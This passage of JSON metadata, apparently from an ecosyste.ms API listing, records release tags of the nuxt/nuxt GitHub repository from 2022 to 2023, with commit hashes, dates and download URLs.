2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0